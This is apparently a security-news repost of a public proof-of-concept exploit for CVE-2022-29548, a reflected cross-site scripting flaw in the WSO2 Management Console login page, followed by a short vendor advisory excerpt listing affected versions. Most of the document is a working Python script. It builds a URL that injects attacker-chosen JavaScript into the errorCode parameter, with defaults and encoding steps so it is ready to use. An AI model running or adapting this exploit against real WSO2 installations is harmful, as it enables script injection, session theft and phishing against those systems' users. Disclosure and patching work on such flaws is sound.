Headline
WSO2 Management Console Cross Site Scripting
WSO2 Management Console suffers from a cross site scripting vulnerability. Many different product versions are affected.
# Exploit Title: WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)# Date: 21 Apr 2022# Exploit Author: cxosmo# Vendor Homepage: https://wso2.com# Software Link: API Manager (https://wso2.com/api-manager/), Identity Server (https://wso2.com/identity-server/), Enterprise Integrator (https://wso2.com/integration/) # Affected Version(s): API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0 and 4.0.0; # API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; # API Microgateway 2.2.0; # Data Analytics Server 3.2.0; # Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; # IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; # Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; # Identity Server Analytics 5.5.0 and 5.6.0; # WSO2 Micro Integrator 1.0.0.# Tested on: API Manager 4.0.0 (OS: Ubuntu 21.04; Browser: Chromium Version 99.0.4844.82)# CVE: CVE-2022-29548import argparseimport loggingimport urllib.parse# Global variablesVULNERABLE_ENDPOINT = "/carbon/admin/login.jsp?loginStatus=false&errorCode="DEFAULT_PAYLOAD = "alert(document.domain)"# Logging configlogging.basicConfig(level=logging.INFO, format="")log = logging.getLogger()def generate_payload(url, custom_payload=False): log.info(f"Generating payload for {url}...") if custom_payload: log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{custom_payload}//") else: log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{DEFAULT_PAYLOAD}//")def clean_url_input(url): if url.count("/") > 2: return f"{url.split('/')[0]}//{url.split('/')[2]}" else: return urldef check_payload(payload): encoded_characters = ['"', '<', '>'] if any(character in payload for character in encoded_characters): log.info(f"Unsupported character(s) (\", <, >) found in payload.") return False else: return urllib.parse.quote(payload)if __name__ == "__main__": # Parse command line parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter) required_arguments = parser.add_argument_group('required arguments') required_arguments.add_argument("-t", "--target", help="Target address {protocol://host} of vulnerable WSO2 application (e.g. https://localhost:9443)", required="True", action="store") parser.add_argument("-p", "--payload", help="Use custom JavaScript for generated payload (Some characters (\"<>) are HTML-entity encoded and therefore are unsupported). (Defaults to alert(document.domain))", action="store", default=False) args = parser.parse_args() # Clean user target input args.target = clean_url_input(args.target.lower()) # Check for unsupported characters in custom payload; URL-encode as required if args.payload: args.payload = check_payload(args.payload) if args.payload: generate_payload(args.target, args.payload) else: generate_payload(args.target)
Related news
CVE-2022-29548: Security Advisory WSO2-2021-1603 - WSO2 Platform Security
A reflected XSS issue exists in the Management Console of several WSO2 products. This affects API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0.